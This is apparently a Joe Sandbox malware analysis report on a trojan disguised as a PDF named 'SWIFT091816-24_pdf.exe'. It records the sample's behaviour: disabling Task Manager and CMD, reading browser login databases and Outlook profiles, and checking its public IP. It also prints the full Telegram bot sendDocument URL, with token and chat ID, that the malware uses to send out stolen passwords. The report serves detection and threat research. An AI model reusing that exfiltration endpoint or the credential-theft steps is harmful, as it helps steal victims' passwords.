            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3753
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3933
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_00403C41 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,LdrInitializeThunk,SendMessageW,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongW,LdrInitializeThunk,SendMessageW,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageW,LdrInitializeThunk,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,LdrInitializeThunk,ShowWindow,DestroyWindow,EndDialog,ShowWindow,0_2_00403C41
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess created: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeQueries volume information: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_00406077 GetVersion,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT091816-24_pdf.exe PID: 7844, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT091816-24_pdf.exe PID: 7844, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT091816-24_pdf.exe PID: 7844, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT091816-24_pdf.exe PID: 7844, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SWIFT091816-24_pdf.exe PID: 7844, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SWIFT091816-24_pdf.exe26%ReversingLabsWin32.Trojan.Garf
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsq69D9.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://reallyfreegeoip.orgf0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.1
              truefalse
                high
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://drive.usercontent.google.com/hSWIFT091816-24_pdf.exe, 00000004.00000003.2664991064.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2630610173.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B79000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.google.comSWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsSWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com/6SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.google.com/vSWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://reallyfreegeoip.orgSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003628A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://reallyfreegeoip.orgSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/SWIFT091816-24_pdf.exe, 00000004.00000003.2664991064.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2630610173.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://reallyfreegeoip.orgfSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://checkip.dyndns.orgSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036255000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://apis.google.comSWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nsis.sf.net/NSIS_ErrorErrorSWIFT091816-24_pdf.exefalse
                                                            high
                                                            http://api.telegram.orgSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000361F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  142.250.181.1
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.21.67.152
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  193.122.6.168
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898USfalse
                                                                  172.217.19.174
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1575732
                                                                  Start date and time:2024-12-16 09:03:08 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 9s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:SWIFT091816-24_pdf.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 93%
                                                                  • Number of executed functions: 147
                                                                  • Number of non-executed functions: 108
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: SWIFT091816-24_pdf.exe
                                                                  TimeTypeDescription
                                                                  03:05:49API Interceptor137x Sleep call for process: SWIFT091816-24_pdf.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                        RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                          3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                            Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      104.21.67.152REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          193.122.6.168Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          checkip.dyndns.comREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 158.101.44.242
                                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 193.122.130.0
                                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 158.101.44.242
                                                                                                          AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 193.122.6.168
                                                                                                          reallyfreegeoip.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 172.67.177.134
                                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 172.67.177.134
                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          api.telegram.orgREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                          • 149.154.167.220
                                                                                                          3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          ORACLE-BMC-31898USREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 158.101.44.242
                                                                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 147.154.242.4
                                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 193.122.130.0
                                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                          • 140.204.52.53
                                                                                                          77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 158.101.44.242
                                                                                                          AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 193.122.6.168
                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          TELEGRAMRUREQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                          • 149.154.167.99
                                                                                                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                          • 149.154.167.99
                                                                                                          lem.exeGet hashmaliciousVidarBrowse
                                                                                                          • 149.154.167.99
                                                                                                          Setup.msiGet hashmaliciousVidarBrowse
                                                                                                          • 149.154.167.99
                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                          • 149.154.167.99
                                                                                                          SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                          • 149.154.167.99
